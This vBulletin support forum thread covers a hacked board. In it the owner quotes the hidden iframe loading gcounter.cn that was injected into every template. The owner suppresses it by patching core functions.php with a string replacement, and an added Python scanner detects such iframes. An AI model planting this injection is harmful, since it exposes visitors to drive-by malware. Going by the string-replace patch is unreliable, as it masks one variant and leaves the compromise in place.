Bloodhound / hacked

  • hyppa
    Senior Member
    • Dec 2007
    • 164
    • 4.2.X

    Bloodhound / hacked

    My forum has been hacked, and we have had a professional team working to try and solve the problem.

    First we had to remove the portal, and then parts of the phpcode.

    This is so called bad-links.

    Also discovered some strange things when I log on:


    gcounter.cn


    ?




    We are still infected here:


    xxxxxx.com is your first and best source for all of the information you’re looking for. From general topics to more of what you would expect to find here, xxxxxx.com has it all. We hope you find what you are searching for!



    How can I solve this?

    Will this disappear if we upgrade?


    Before logging in we get this error code:

    I am talking about the error messages:

    Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /index.php(537) : eval()'d code on line 160

    Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /index.php(537) : eval()'d code on line 236



    I assume that is because the Symantec team has removed some of the original PHP code to try and solve this.


    It disappears after logging in.






    So my question is:


    How do I solve this?

    By upgrading?



    No point upgrading from 3.6.8 to the latest if the hack is still there.





  • Steve Machol
    Former Customer Support Manager
    • Jul 2000
    • 154488

    #2
    That specific error is from a plugin you've installed. You need to disable each of your plugins, then turn them on one at a time to see which one is causing this.

    If you cannot log into the Admin CP then to disable the plugin system, edit config.php and add this line right under <?php

    define('DISABLE_HOOKS', true);

    This will disable all hooks and allow you to log in properly with no hooks running.




    Please see this thread on how to make your vBulletin more secure:



    If you are still being hacked after doing all of this, then they are most likely doing this by accessing your server. You need to contact your host about this.
    Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
    Change CKEditor Colors to Match Style (for 4.1.4 and above)

    Steve Machol Photography


    Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.



    • hyppa
      Senior Member
      • Dec 2007
      • 164
      • 4.2.X

      #3
      Hi.


      I had to find this code in all the templates:



      <iframe src=http://gcounter.cn style=display:none></iframe>


      and remove it.

      and then stop the virus/hack by doing this:


      change include/functions.php line 4925

      $output = process_replacement_vars($vartext);

      to

      $output = str_replace("<iframe src=http://gcounter.cn style=display:none></iframe>","",process_replacement_vars($vartext));





      So it was gcounter that was the problem.

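The template search described in post #3, as an added example that is not part of the original thread: a Python scanner that parses template text and reports hidden iframes loading from hosts other than your own, including unquoted, upper-case and line-wrapped variants that a literal string search misses. It assumes the template contents have already been exported to text; the function names, the `own_hosts` parameter and the sample templates are constructed for illustration.

```python
from html.parser import HTMLParser
import re
from urllib.parse import urlparse

# Style fragments that hide an element from the visitor.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

class HiddenIframeFinder(HTMLParser):
    """Collects (line, src) for each iframe a visitor would not see."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}  # names arrive lower-cased
        zero_size = a.get("width") == "0" or a.get("height") == "0"
        if HIDDEN_STYLE.search(a.get("style", "")) or zero_size:
            self.hits.append((self.getpos()[0], a.get("src", "")))

def scan_templates(templates, own_hosts=()):
    """templates: {name: text}. Returns [(name, line, src)] for hidden iframes
    loading from a host outside own_hosts; relative URLs count as same-site."""
    findings = []
    for name, text in sorted(templates.items()):
        finder = HiddenIframeFinder()
        finder.feed(text)
        finder.close()
        for line, src in finder.hits:
            host = (urlparse(src).hostname or "").lower()
            if host and host not in own_hosts:
                findings.append((name, line, src))
    return findings

# Constructed sample templates (not taken from a real board).
SAMPLE = {
    "footer": "<div>$copyright</div>\n"
              "<iframe src=http://gcounter.cn style=display:none></iframe>\n",
    "header": '<IFRAME SRC="http://gcounter.cn"\n  STYLE="display: none"></IFRAME>',
    "navbar": '<iframe src="http://forum.example/chat.php" style="display:none"></iframe>',
    "FORUMHOME": '<iframe src="http://video.example/e/1" width="560" height="315"></iframe>',
}

if __name__ == "__main__":
    for name, line, src in scan_templates(SAMPLE, own_hosts={"forum.example"}):
        print(f"{name}:{line}: hidden iframe -> {src}")
```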

      • hyppa
        Senior Member
        • Dec 2007
        • 164
        • 4.2.X

        #4
        Originally posted by Steve Machol
        That specific error is from a plugin you've installed. You need to disable each of your plugins, then turn them on one at a time to see which one is causing this.

        If you cannot log into the Admin CP then to disable the plugin system, edit config.php and add this line right under <?php

        define('DISABLE_HOOKS', true);

        This will disable all hooks and allow you to log in properly with no hooks running.




        Please see this thread on how to make your vBulletin more secure:



        If you are still being hacked after doing all of this, then they are most likely doing this by accessing your server. You need to contact your host about this.

        I have tested this out and cannot find any hack that causes this. Can this be because I have removed the portal?


        • Steve Machol
          Former Customer Support Manager
          • Jul 2000
          • 154488

          #5
          Possibly. I really don't know what modifications you made.

          • hyppa
            Senior Member
            • Dec 2007
            • 164
            • 4.2.X

            #6
            Found it. It was actually two different hacks, but I had to find the combination.


            THANKS.
